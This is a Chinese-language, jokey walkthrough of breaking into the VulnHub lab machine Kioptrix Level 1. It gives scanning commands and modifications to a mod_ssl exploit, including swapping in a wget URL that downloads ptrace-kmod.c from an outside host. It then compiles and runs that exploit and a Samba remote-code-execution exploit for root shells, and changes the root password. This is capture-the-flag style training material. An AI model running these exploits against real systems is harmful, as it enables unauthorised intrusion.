VulnHub - Kioptrix Level 1 破解

环境说明：
靶机： 172.21.137.46
KALI：172.21.137.36

渗透过程：
由于是渗透嘛，信息收集总是必不可少，来吧！信息收集搞起来！奥利给~~

人穷不说废话，直接Nmap扫一扫！命令是！nmap -n -v -sC -sV -Pn --open -p- -T4 172.21.137.46，问命令都是什么意思，我哪知道！？直接用就完事儿了！你nmap都不会用你还好意思说是做渗透的？给我看图！憋BB！

图都看完了你说看不懂！？建议你关闭浏览器，打开游戏平台，该干啥干啥去。
上图都看到了吧？Nmap这个小老弟都告诉我们开了什么端口了，22、80、111、139、443、1024，一共开了2×3个端口，东西看起来还蛮多的，这时候是不是有点懵？
别慌！这正好告诉我们攻击面有很多！可以慢慢搞！这先留着，先把图中的组件版本信息记录下。
直接去看主页，访问http://172.21.137.46/，见图！

看到了吧！这下就有东西了！果不其然，一看就知道是个最没有可能有漏洞的测试页了！Test Page看到没！头顶上写着呢！
果断找其他出路！用dirsearch 看看有没有什么目录好访问的！命令！./dirsearch.py --random-agents -u ‘http://172.21.137.46/’ -e *，结果见图：

赶紧访问下manual、mrtg、usage这三个目录！发现，果然就是说明文档！一点用都没啊！你说为什么不放图？我懒得放！截图不需要时间啊！我一秒钟百万上下啊！能这样浪费啊？！
你又问！不还有个test.php呢吗，怎么不访问啊？你当我和你一样傻？早就看过了啊！就一个没解析的php4文件，一点鸟用都没有啊！shut up! 看哥操作！ OK?

既然啥都没有用！那还搞个鬼啊！作为黑客就是要果断啊！立马关闭靶机！吃喝玩去啊！折腾这干啥啊！结束！

咳咳，我开玩笑的！回来啊！不日站还做什么黑客！黑客不能开玩笑啊！？

既然目录找不到东西！只能从端口访问！发现都没法直接访问啊！这咋办啊！总不能爆破22端口吧！这也太LOW了啊！
只能借助巨人之力了啊！Nikto! 给我冲！！！命令 nikto -host http://172.21.137.46，见图！

从扫描结果看到mod_ssl好像有个溢出漏洞，还能执行SHELL啊！牛皮！果断找EXP啊！
命令!searchsploit mod_ssl，见图：

鬼鬼！还真有啊，但是用哪个啊！看下版本，我们当前的是2.8.4的！奥利给！用第四个！你问我为啥不用第三个？！我就要用第四个啊！V2说明是最酷的版本啊！不用它用谁啊！
但是因为版本很旧了！编译好后根本不能用啊！！看网上说要修改下EXP内容才行啊！改起来！

步骤！如下！啊：

• 编译需要用的libssl-dev库，且版本为apt-get install libssl1.0-dev
• 在exp中加入头文件和
• 替换exp中的wget后的url为http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
• 第961行,修改为const unsigned char * p，* end;

改好后要编译！
gcc -o OpenFuck 764.c -lcrypto

编译好后，看下有什么参数！用命令./OpenFuck,见图！

看了匹配的只有0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1 和0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 啊！实际用了发现0x6a 是不行的！用2啊！命令！./OpenFuck 0x6b 172.21.137.46 -c 50，直接远程溢出后GETSHELL了啊！

任务就结束了啊！什么！你说这个SHELL是原生的啊！互动起来完全不方便啊！你薛的DEI啊！但是我看了它python是1.5的啊！给我看图！命令是！python -v

没法用python -c ‘import pty; pty.spawn("/bin/bash")’ 换到遍历的交互环境啊！
这还没结束啊！我们现在虽然是root！但是密码不知道啊！那怎么办！改密码！！！命令！passwd ！ 你没看错！就是这么短！
改啥看你喜好！改好成功登录！见图！

任务结束！下面还会提到另外一种方法GETSHELL！记得看啊！

方法二：
还有第二种方法可以来GETSHELL，主要是在前期的信息收集中已经发现了139端口使用了Samba服务，见图

尝试用同样的方法找Samba的可利用EXP，但首先我们要知道当前Samba是什么版本的，扫描器没告诉我们，要用其他方式，命令为：smbclient --list=172.21.137.46 -N（–list等同于-L），利用smbclient工具可以通过139/TCP端口获得该服务的旗标。
上面命令调用smbclient连接到目标主机，然后显示服务的信息，如图

• -N 表示不用询问密码，因为我们没有目标的root密码
  从图中获取到了Samba的版本，为2.2.1a，那直接去漏洞库里找，命令searchsploit samba 2.2,如图：
  
  看到有很多可用的，直接用最后远程代码执行的EXP，你问为啥用这个？因为上面都是溢出啊，下面Remote Code Execution 这几个英文字是不是看着很眼熟！就直接用这个，把文件用命令CP复制出来，再用命令 gcc 10.c -o samba 完成编译，然后可以直接./samba看可用的参数，如图：
  
  用-b参数选择平台，用-c参数填入要链接的两个本地和靶机的ip地址，命令为：./samba -b=0 -c 172.21.137.36 172.21.137.46，见图：
  
  图中看出，很快就GETSHELL了，比上面那个好用，完事儿！：）

参考链接：

1. https://blog.csdn.net/xundh/article/details/77351716
2. https://blog.csdn.net/secupdate/article/details/9152865
3. https://blog.csdn.net/yexiangcsdn/article/details/82867469
4. https://resources.infosecinstitute.com/kioptrix-level-1-walkthrough/
5. https://medium.com/@Kan1shka9/kioptrix-level-1-walkthrough-61959269a2bc
6. https://uknowsec.cn/posts/notes/Vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%BB%83%E4%B9%A0-Kioptrix-1.html